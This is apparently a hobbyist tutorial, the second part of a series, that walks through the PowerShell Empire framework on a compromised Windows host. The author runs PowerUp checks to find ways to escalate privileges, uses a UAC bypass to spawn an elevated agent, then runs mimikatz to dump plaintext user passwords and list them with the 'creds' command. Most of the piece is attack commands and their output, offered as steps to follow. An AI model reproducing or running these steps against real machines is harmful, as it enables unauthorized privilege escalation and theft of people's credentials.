Hijack The Passwords

This is actually the 2nd part of “Attack the Powershell”


*Type 1 by 1*
(Empire: R11CTZCNR1HRAF23) > usemodule privesc/powerup/allchecks
(Empire: privesc/powerup/allchecks) > execute
*Wait a while & you will get this output*

Job started: Debug32_h9wkp

[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges…
[+] User is in a local group that grants administrative privileges!
[*] Run a BypassUAC attack to elevate privileges to admin.

[*] Checking for unquoted service paths…
[*] Use ‘Write-UserAddServiceBinary’ or ‘Write-CMDServiceBinary’ to abuse

[*] Checking service executable and argument permissions…
[*] Use ‘Write-ServiceEXE -ServiceName SVC’ or ‘Write-ServiceEXECMD’ to abuse any binaries

[*] Checking service permissions…
[*] Use ‘Invoke-ServiceUserAdd -ServiceName SVC’ or ‘Invoke-ServiceCMD’ to abuse

[*] Checking %PATH% for potentially hijackable .dll locations…

[*] Checking for AlwaysInstallElevated registry key…

[*] Checking for Autologon credentials in registry…

[*] Checking for vulnerable registry autoruns and configs…

[*] Checking for vulnerable schtask files/configs…

[*] Checking for unattended install files…

[*] Checking for encrypted web.config strings…

[*] Checking for encrypted application pool and virtual directory passwords…

Invoke-AllChecks completed!

(Empire: privesc/powerup/allchecks) > back
(Empire: R11CTZCNR1HRAF23) > bypassuac hack
[>] Module is not opsec safe, run? [y/N] y
*You should get this output after a few sec*
[+] Initial agent BW223Z3NEM1PDXF1 from is now active
(Empire: R11CTZCNR1HRAF23) > agents

[*] Active agents:


*As you can see, you have a new agent, but pay attention, there is an asterisk before the UserName at the new agent, that’s means that this agent is bypassed the UAC*
*Let’s interact this agent by the command*
(Empire: agents) > interact BW223Z3NEM1PDXF1
(Empire: R11CTZCNR1HRAF23) >
*Let’s type “mimikatz”. The mimikatz is a script that known how to view plaintext passwords.
(Empire: R11CTZCNR1HRAF23) > mimikatz
(Empire: R11CTZCNR1HRAF23) >
*You should get an output list with your all plaintext users & password.
*After you getting the messge – type*

mimikatz (powershell) # exit

(Empire: R11CTZCNR1HRAF23) > creds


Here is an example by Gamer Forever